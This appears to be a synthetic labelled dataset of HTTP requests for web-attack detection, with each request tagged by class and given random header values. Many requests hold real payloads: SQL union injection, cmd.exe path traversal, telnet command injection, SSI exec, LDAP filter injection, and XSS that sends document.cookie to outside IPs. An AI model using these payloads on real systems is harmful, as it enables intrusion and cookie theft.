UA-CPU: Sparc
UA-Disp: 1190,0442,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: 3.8 www.radF02E.jpeg, 6.5 www.PfasqUst.gif, FTP/3.6 37.55.126.58
Transfer-Encoding: notx
Upgrade: yppEuf/2.4
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38756
Start - Id: 41780
class: SqlInjection
GET /8WKmScIpPnchildtmpu8/sid/Yb@n/sm6seEtshe2t/1pW9.lX44/iVbFA5FkpDLnVFM1qA.msf?ieR2h9nrecz5re=beaetiira+E+6e+a&Glb_R271=o4KL.-3YS&mochaPR2_eunioncsystemDP=0314&rIqaelt=%27+AND+USER_NAME%28%29%3D%27iuisgo&ih53duenC2d9da=64&eldhkleaemneud=uu6m HTTP/1.1
Host: www.eitnndks.de
Connection: eEeA
Accept: audio/basic
Accept-Charset: windows-1255;q=0.5
Accept-Encoding: 
Accept-Language: istwo-cq7iat;q=0.1, a-r, hlt-gudo;q=0.0
Cache-Control: max-age=2
Client-ip: 19.38.3.115
Cookie: XNwgetXDT=veir;opTHtCewhn=655926;moiDeRr7rncas6=04109
Cookie2: $Version="3"
Date: Sat, 03 Jul 04 11:53:19 UTC
ETag: ".4g273Gu0e1YegQr"
Expect: oT8d=iIlx;zinlIOcf
From: rhuEDm@qpruheT.de
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Tue, 09 Jan 07 19:43:26 UTC
If-Match: *
If-None-Match: "OGYQBOHGVybBWsl_C"
If-Range: *
Max-Forwards: 692
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: xioe0i emhA=efh6etg
Range: 4745-5836
Referer: http://rpjohtja.uk/oi2na/it5inpt4/dseEg/n7ay.txt
TE: trailers,deflate,trailers
Trailer: Upgrade
User-Agent: ud0hned (j7VrXs)
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5624x146
Via: 4.4 72.177.11.237
Transfer-Encoding: deflate
Upgrade: ped/5.7, utiwa/4.3, NDinca/1.6, HleG/8.5, 6ot/6.6
Warning: 899 www.hlrs.js:0974 "osaznrsham4kiehae5n" "Mon, 18 Jul 05 24:25:09 CET"
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 79451842006720281
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41780
Start - Id: 44502
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.urlidasece.net
Connection: Kfay7s
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity, gzip, deflate, identity;q=0.2
Accept-Language: *;q=0.7
Cache-Control: max-age=5
Client-ip: 245.96.181.37
Cookie: laNufng=k;9gusrrj-.=eoqesnxary9f;utg=79;wfa4beV7B=rnio?olania
Cookie2: $Version="88"
Date: Sat, 17 May 08 02:02:00 GMT
ETag: W/"MYr9ZmTiyD.S_ICN2G"
Expect: sfshsaRs=urgyr;h087du=rtocyehe
From: j8bohsN@sn0s.it
If-Modified-Since: Mon, 10 May 04 10:11:48 CET
If-Unmodified-Since: Mon, 21 Feb 05 05:49:26 CET
If-Match: *
If-None-Match: "3owuL_Pw4tI2EKGv6k"
If-Range: Sun, 24 Aug 08 19:22:29 UTC
Max-Forwards: 085
MIME-Version: 8.2
Pragma: wd=vaec
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: http://smrvm.gov/hammihOh/lresbpih/abnanel/ts1b.msf
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 7.6; ev-md; rv:7.1.0) Gecko/50882562
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 455x841
Via: usi/5.0 44.195.109.125
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44502
Start - Id: 46508
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: 193.33.92.16
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 214.228.199.146
Cookie: txse=mwisoeEasoets;ymcteevtn=rdit0)ajevaltteiRT8tio;uioeq9raRsieh=2162157
Cookie2: $Version="761"
Date: Fri, 29 May 09 16:31:58 GMT
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: TyeArn
From: csa3iee@teat.com
If-Modified-Since: Thu, 30 Apr 09 09:54:53 CET
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Oct 09 13:34:20 UTC
Max-Forwards: 32
MIME-Version: 0.6
Pragma: egaet=ep
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: uflam edBtl=heEet
Range: 8817-695585,1-
Referer: /Nnrceprt/8c8TdRt2/9tdA6.mp3
TE: trailers,chunked;q=0.1
Trailer: Pragma
User-Agent: Mozilla/3.4 (compatible; Konqueror/2.5; Win 9x; ds8dfytf; tt4aaAoGe; CuyoOra)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/3.9 241.61.186.59
Transfer-Encoding: gzip
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 270 www.Taaaeh.shtml "aOxgliirnstyeOIeo6rn" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46508
Start - Id: 47901
class: XSS
GET /3O%u-GncM7DimgL/ia3dYmKQlxBFav2Y/arekpngeprEhih/V3w@NFWKZO2H/vhuyhdzegggiyctm.pl?hoirieesOvZritt=46008630&ex0c=297292&e8fte=gaAnz%3FLrHeo&1tsrmihI4seTcoq=+%28a&reo4uayT=2nuRh&daiap=74968051&ee=98018&eNoslnrsaeesc=503654&6XghttpsZAFdocumentgvoQ=aTs&tioiradt=ef&fWEs=9&dt2aonC=oaeers+at%5CRoo&ccI2oeIbWed=mut&wp-35uRwV6xj=ijorlsy%28h&NRMkpel=%26%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F93.147.51.148%2Ftrel.mspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E HTTP/1.0
Host: www.etlelidmtt.it
Connection: close
Accept: */*;q=0.0
Accept-Charset: shift_jis;q=0.4, x-mac-arabic;q=0.0, iso-8859-3;q=0.1, x-mac-icelandic;q=0.8, koi8
Accept-Encoding: *;q=0.7
Accept-Language: kct-l;q=0.0, rno-aoi
Cache-Control: no-store
Client-ip: 73.100.104.87
Cookie: n8ehldh7pT6ed=vstdinrtafromlogssr'ol7+li7;tih73ren=93|ia7ilibnertCeni;g-B0743S7qq=659;sw=58;eIsleel=632513;oaqrnRRvee=24933
Cookie2: $Version="42"
Date: Thu, 08 May 08 19:03:12 UTC
ETag: W/"sMWA4udOhaWo3S40bpz"
Expect: reeofnse
From: rigu@deao.net
If-Modified-Since: Mon, 23 Jul 07 11:48:31 GMT
If-Unmodified-Since: Wed, 06 Apr 05 15:24:20 CET
If-Match: "bvb3LuTjSIw@qID"
If-None-Match: "uFA8eu01lA2N9_OH"
If-Range: "JRA3Z@PzKBKNJHK7pU"
Max-Forwards: 4577
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest algorithm=MD5
Range: 53066-01
Referer: /syhshshA/nsELi/iht1yty.html
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 6.5; 7o-se; rv:1.4.5) Gecko/51013427
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: pRlae
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 274 128.194.66.58 "9hsdoz" "Fri, 21 Jan 05 16:59:18 CET"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47901
Start - Id: 38703
class: LdapInjection
GET /aeY-/e7z1TuB/ihg-ZQAso/hO1qOZreT4uUilSun@GP/5ide4vtdnqtwSdiea.tiff?hrdnnciEshec=UOwunceo&sus3wcwhaNs=aR3P2DyDUs2U&yiNdmutS=lacexsb4hvgair8&nLQAbaFuab=tao3Sq8izrb9tvc&UP88=hetcSe&cd=63863469&lliie=13446&46Oui=4i0%29%28%26%28objectClass++++%3D++b7w*%29 HTTP/1.1
Host: www.kanosrwk.ch:80
Connection: swhhoOL
Accept: */*;q=0.6
Accept-Charset: euc-cn;q=0.7, x-mac-cyrillic;q=0.5, windows-1258;q=0.4, utf-8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=578
Client-ip: 244.26.7.222
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="4"
Date: Thu, 19 Oct 06 15:09:10 GMT
ETag: W/"PVcmfJxnkWU@I6@XHg8W"
Expect: 100-continue
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Sat, 21 Feb 09 07:31:23 CET
If-Unmodified-Since: Fri, 04 Jun 04 03:59:30 UTC
If-Match: "y0pGYppoWQogUHNO18"
If-None-Match: *
If-Range: *
Max-Forwards: 537
MIME-Version: 5.4
Pragma: l='IseEni'
Proxy-Authorization: NTLM eTlKZXRmcGlubWtvZUJlZGZzZ2VBcmhlZ2RlbmViOTM0ZWVnZmVudGloaHdlb2ZC
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: /lees/telw8ut/ssms/araen3h/ih9i4t2.asp
TE: deflate;q=0.3,trailers,trailers
Trailer: If-Modified-Since
User-Agent: fnmiiutab
UA-CPU: PowerPC
UA-Disp: 849,080,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: 3.0 www.tde1aslY.html, 3.4 www.iloee.jpg
Transfer-Encoding: mrta
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38703
Start - Id: 41342
class: SqlInjection
GET /bhtyapsm/teteH5d3Snaii/nmHl8q/lpnrnr31iMna/6odhstesnn/nhi@9XQN/c5ytaEgFr5vC8nn/eT8kVG12e0vQrAB/kV7.Da.shtml?sdaxe5rfalrae=cgreieeM9lnss&Pwtoyiuihnfk=64171307&1GYP=%29a&2zutt0S6aatLn=nic9mN+alog%3C&e5tnibbUonrsaac=xigseil5 HTTP/1.0
Host: www.ihfm.de
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Msajp-ao, isnEtnk-i, uetonct-ttnssmst
Cache-Control: rNlTp=2aaii
Client-ip: 104.231.92.120
Cookie: si=snp;vqtuqo0hsQ=oDB;O6epe='    )    UNION  ALL    SELECT    360 FROM qteCaon WHERE   (    ''   =  ';ieSrecsseir=e8ppenzbrA
Date: Wed, 07 Mar 07 04:38:08 UTC
ETag: "L@aXYzXLvTxU2_J"
If-Modified-Since: Thu, 02 Feb 06 12:26:36 UTC
If-Unmodified-Since: Tue, 17 May 05 14:35:55 GMT
If-None-Match: "Sl9Z9c3Vvv5LouOEF1"
If-Range: Tue, 02 Feb 10 22:30:20 UTC
Max-Forwards: 94
Pragma: no-cache
Authorization: fasu hrhhn=wh0e
Range: 6-,-60612
Referer: http://8s5viuee.ch/tsrE.png
TE: chunked,deflate
Trailer: Accept
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 8.7; ed-rb; rv:3.6.5) Gecko/35390428
Via: 6.8 www.adn3h.jpeg, FTP/1.9 154.220.183.103
Transfer-Encoding: gzip
Upgrade: rTnh/2.4
X-Forwarded-For: 68.229.77.119
X-Serial-Number: 6950157173290269594

null

End - Id: 41342
Start - Id: 43240
class: OsCommanding
GET /ogdnEeooE/lvtuti1LBvMW@JjfloU/seMfhSoezouak/njPiRJ1cjHAyjge2u4-R/sO0COe7unionlikeVvfZw/3Uq/lO9rLTz.ax@_/ck/N6likeSOm/AO8-h_g4RTJzRO/pb6gl5x.mspx?p7wqasLdlh0onRd=yNEJ&lsc9nT=%22++++%3B++++telnet+180.176.245.218+80%3B&bood3c=HrAo&yhh6aemiwt=99304&amhos8abish7g=5543&cineciCoduscetW=01074690&ririrloaimfs=io+o7z&ynRgtn2ntRs1=029064&ynhhuf8rsu=7587649609&wmjeDa=ewI8GS&Uks51creimfha8i=p+i&krt=457750955&mi=%25%28o&zr=tste1scoo7mnare&oCs2dnIiFnnsInC=sail%5D HTTP/1.0
Host: www.nBodeompne.org:5
Connection: btawmsi
Accept: audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 36.195.182.59
Cookie: TqOpatsv5imn=9wr;cnotctfbsi5onl=A0Nsimh5;EAqy1canwott=l-HgYRF5rgk;ueeitENleIddy=r 
Cookie2: $Version="086"
Date: Fri, 06 Feb 09 16:15:42 CET
ETag: "7vRs2CO.Rsi0wa-sA5q"
Expect: ioiitno=sbij
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Sat, 20 Mar 10 20:27:51 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Sep 07 08:34:25 CET
Max-Forwards: 75
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ckts natesru2=rltfdnt
Range: -330,06836-
Referer: /ena2hnit/stmdfuee/HAx8rtws.mspx
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.0 (compatible; MSIE 7.5; Win 9x; ieod3)
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: FTP/3.7 4.96.247.82, HTTP/8.9 www.2xxAl.html, esikn/8.8 www.to6hea.tiff
Transfer-Encoding: deflate
Upgrade: nbUlro/5.5, yfi/5.9, islxmt/9.6, tmL/9.7
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 173.145.188.232
X-Serial-Number: 3809752703652
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43240
Start - Id: 46983
class: XSS
GET /3d5XuhNhj/uassmse/iruddrse.shtml?IMZAW=iA656Zm%40I&a5life3=%3Cimg++src++++%3D++%22++++llermestli+%22onmouseover%3D++%22++++%5Bwindow.open%28%27http%3A%2F%2F151.76.26.19%2Fsind.asmx%27%2Bdocument.cookie%29%3B%5D%22+%3E HTTP/1.1
Host: www.gsgdt.be
Connection: gOwy
Accept: video/*, audio/x-wav;q=0.0, image/gif
Accept-Charset: x-mac-roman, x-mac-arabic, x-mac-ce
Accept-Encoding: identity, compress, identity;q=0.2
Accept-Language: *
Cache-Control: max-age=7803
Client-ip: 128.77.209.28
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Tue, 14 Sep 04 07:21:39 GMT
ETag: W/"Buq@whtrMtHZH-Bk7Zb"
Expect: 100-continue
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 25 Sep 06 19:21:45 CET
If-Unmodified-Since: Mon, 22 Mar 10 03:24:30 CET
If-Match: *
If-None-Match: *
If-Range: "w6J_AGL-poMHck9z3z"
Max-Forwards: 451
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: 5-22964
Referer: /0eweh4aa/rsseoTpb/y1feank/eeaahpni.tiff
TE: trailers,gzip,gzip;q=0.5
Trailer: Cache-Control
User-Agent: csmhodnegd/5.6.0.5
UA-Disp: 2976,173,32
UA-Color: color8
UA-Pixels: 199x2885
Via: HTTP/3.6 www.hYbvu.tiff, sel/7.6 159.246.100.101
Transfer-Encoding: gzip
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 153.150.34.190
X-Serial-Number: 09560109
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46983
Start - Id: 38255
class: LdapInjection
GET /mshqhIMAA1/gU5Qmx16lIKegq/aMmz_HaQS/7ZstirA/tnodeltlk/2tn63ao0aWmieh.jpg?ntmewsnwe=ri8&n9t4lgsote=89565&r6tj5d=dDBH633LY&2eotgvdlod=gTimged0asS&QautoexecXW4tIAjtmpk=91%29%28%26%28objectClass%3Dcae%29%28%7C%28sn++++%3D++eih%29%28cn%3Dh++++J*%29%29&rihsexstfltt=9438&xaKBZadminZP=%26fromx&sn0=peveiAscae&e3lAHh=089899&xnkI2shpcp=4269&pa-where6jpYallg1=eNBgMcwgQ1 HTTP/1.1
Host: 245.16.216.240:80
Connection: 3szeo
Accept: */*;q=0.5
Accept-Charset: cp-936;q=0.0, iso-8859-2;q=0.5, iso-8859-3;q=0.2
Accept-Encoding: 
Accept-Language: ua9u-zstter
Cache-Control: no-transform
Client-ip: 113.81.106.78
Cookie: Vg-mEnS.Rftp=eyo$itacQftpug;eSllHtibAmea=lAMm3Iv3fgC;bmoenes6Ayst2=|6s~/
Cookie2: $Version="7"
Date: Sun, 25 Jan 04 24:40:39 GMT
ETag: W/"DNHJE2Dphp9snBkz4oAm"
Expect: seeqhc=sss6
From: Eorust@uthn0.it
If-Modified-Since: Sat, 11 Apr 09 19:41:02 GMT
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: "o8xU69oDhENqsmWJ.QN-"
If-None-Match: *
If-Range: *
Max-Forwards: 7904
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: Digest uri=/ohss4cOO/fenttGen/putfh5ht/atern.mdb
Range: -23
Referer: http://tohfhooc.ch/otgaoenz/1maeronr/ltZNluo/eNdTYt/htme1h.gz
TE: chunked,deflate
Trailer: Proxy-Authorization
User-Agent: 9mIml (m14@.l; eyPti5gs3; nRnIkdt)
UA-CPU: PowerPC
UA-Disp: 087,798,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 047x334
Via: FTP/1.7 www.metiens.tiff, FTP/3.1 10.162.11.207
Transfer-Encoding: compress
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38255
Start - Id: 44844
class: PathTransversal
GET /cr/eHjweu5H6/vHvarJwAQwFH3.php?eEAuTjact6=97491833&Cmhie9N=collection%28+++++file%3A%2F%2F%2Fc%3A%2FUhrDt%2FBa8hr.xml+%29 HTTP/1.1
Host: 201.14.230.0
Connection: close
Accept: video/*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.9, deflate;q=0.8, identity
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 55.4.250.85
Cookie: eo5he=<7l5hs;gteo8ia3EkesAoc=|@ei[;_8documentKBUFfQN=926943;oehssoolA8iuioo=ox6N_E7X
Cookie2: $Version="393"
Date: Mon, 22 Mar 04 07:04:25 GMT
ETag: W/"b_5jV2f9CFXueFMht3"
Expect: t2jari=v7s2
From: hohEtsbm@c8e2atu1l.be
If-Modified-Since: Sun, 07 Jun 09 21:51:29 UTC
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: *
If-None-Match: "8spgIl6Vt8rYwmzm"
If-Range: *
Max-Forwards: 87
MIME-Version: 8.7
Pragma: nmb1l=wewhttdc
Proxy-Authorization: NTLM bmp3dmpkc29uMHRlZnJvSHVhc25odGNQc2ludGwzb05DdDExc3Rjb2k=
Authorization: iYti dnel1=iitt
Range: 776321-,6-
Referer: /nwrr/Rnetopes/nnnzh/cyodsfo.gif
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: hfeWRE http://www.7iea1bij.ch
UA-CPU: StrongARM
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: HTTP/6.5 25.52.77.254
Transfer-Encoding: a5ojh3
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 083276
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44844
Start - Id: 36006
class: PathTransversal
POST /tVOW99DNsI/window.open48yW/2dTGdIe/gdofsqavxttteos7jVuo/f7kQdLZM/4lodpadTsphs/Blhhi5oonbPDoo2lr/nuhrtrllu/JDTHbetweenZp/tr3ohpe2inqhwt/rhexhhc2peitea5w.tiff? HTTP/1.0
Content-Length: 131
Content-Language: h,2tan,iedEovT
Content-Encoding: deflate
Content-Location: http://www.giin.org/osleseSo.exe
Content-MD5: d2k5dzRwcmpQZHJuMnRhQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Oct 09 10:51:53 UTC
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 238.209.44.128
Connection: close
Accept: */*
Accept-Charset: gb2312;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 186.39.176.5
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Sat, 16 Jun 07 16:13:41 UTC
ETag: W/"WcuTKJ-E0lIjdULM"
Expect: ueoc69
From: vgkun@sTsiY.org
If-Modified-Since: Sun, 05 Dec 04 18:23:33 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "FQH.Qe.H3XBlf_P1l9h"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.1
Pragma: 8e='ql'
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: Digest response="b001AD8663ac586b9BBEABDeE3bAF9ed"
Range: -7612
Referer: http://EcTT89.ch/oyPred/uhha/eWale/6otmrrLo.cgi
TE: trailers,gzip,chunked
Trailer: Accept
User-Agent: Mozilla/7.2 (Windows; U; WinNT 2.8; wo-so; rv:8.7.1) Gecko/06139344
UA-CPU: Sparc
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: HTTP/6.7 www.aihiym.gif, nis9/2.3 140.29.51.181, FTP/0.6 180.25.204.39
Transfer-Encoding: utonch
Upgrade: 4tnu/7.8, odsAo/4.6, iuf/3.2
Warning: 079 www.ty5irnr.htm "sToi3dnrtjcr3noepnhr" 
X-Forwarded-For: 88.215.245.58
~~~~~: ~~~~~~~~~~

tlkie4atm6trrtI=1034&ipAHnigfy=../../../../../../../../../WINNT/autoexec.bat&Aosaaatlontb0=xrnyetcaf<se634s s

End - Id: 36006
Start - Id: 39925
class: SSI
PUT /5nte5l.jpeg? HTTP/1.1
Content-Length: 277
Content-Language: eoeyeee
Content-Encoding: deflate
Content-Location: http://esdo.net/EaNT.bin
Content-MD5: eWl1YWRlbm90aXBOb29zdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Sep 07 14:08:27 CET
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: www.sutiih7.cz:80
Connection: close
Accept: */*
Accept-Charset: windows-1258, iso-8859-8, iso-2022-jp, x-mac-chinesesimp, utf-8;q=0.0
Accept-Encoding: 
Accept-Language: ssn0n-e9aelh
Cache-Control: min-fresh=7821
Client-ip: 212.135.54.151
Cookie: al=4
Cookie2: $Version="25"
Date: Sun, 31 Jan 10 06:55:48 GMT
ETag: "7R2aU4_ypGn5n9WA"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Thu, 09 Jul 09 03:29:13 UTC
If-Match: "gssuUYT8PYMHjt4Af_"
If-None-Match: *
If-Range: Sat, 01 Aug 09 03:06:34 CET
Max-Forwards: 56
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Digest username="eseT3sEl"
Referer: http://onm5y.org/hnbs/livfqsdf/onee7.rar
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: aesxornstzrebieactmt
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: compress
Upgrade: rZos/0.7, seee/7.7, tpcri/7.2, yeGh/9.2, etshoj/4.1
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iinet5sa4S=79544631&mt6Ll=iXortDeTUEXm&2n3rpentsr=r&sot1oq=7&abTey=ttqielilfn&ZxtvdeoteheVous=ll4&HkSahnrdr=<!--    #exec  cmd="/bin/ls  -l  /home/dhaolg0oCz/dtfdedodno" -->&LpassthruOs8KZN=qowrib&PF8u=Aservicese(e/nMohaoi'a&ta5hnnnr1snaz=e nskiue

End - Id: 39925
Start - Id: 37701
class: LdapInjection
POST /xA8l/meWQpomjP2wgHb2-P4UI/7zUx5MhG/if6YC-O.js? HTTP/1.1
Content-Length: 228
Content-Language: gGqadn,usre,b
Content-Encoding: deflate
Content-Location: /Icdqa9/yymhw/cDme8an.pdf
Content-MD5: ZXlqbG1uYnJjbU5ldW1oeg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Nov 08 03:24:45 GMT
Last-Modified: Mon, 03 Jan 05 05:56:02 GMT
Host: www.rpndaet2Aw.it
Connection: close
Accept: text/*, video/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 237.81.61.20
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Fri, 20 Jun 08 13:01:50 UTC
ETag: "n4cBYNpmLWIikXUq4-kH"
Expect: lne8p5et
From: thGyc@rjbnmtcw.gov
If-Modified-Since: Sun, 30 May 04 15:26:48 UTC
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: *
If-None-Match: *
If-Range: "aZK5oU0xpZjJNXu"
Max-Forwards: 484
MIME-Version: 4.9
Pragma: R='cetrecei'
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: http://ytinfah.be/D4ts.dll
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: Mozilla/4.1 (X11; U; Open BSD i586 0.4; nh-Ii; rv:9.6.6) Gecko/67417907
UA-CPU: MIPS
UA-Disp: 0739,408,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 940x1719
Via: jeat8/4.0 15.73.239.171:87
Transfer-Encoding: compress
Upgrade: oia/6.0, uNfl/8.0, net/8.9, ai8/5.6
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

kteRyair=hh&rDC6=")(targetfilter=(o=NetscapeRoot))&15wr5mtD=dglpahpassthrueeevaloob&weita0riesms=wy9hb7Hrfrflu3jdE&iSiteuhaovaNeEd=hjaAIfAcioiHcs&osh=043815&6s3n5ni=0650055237&aE=2514566&eoqhslgcotphq=opt eigaaoa

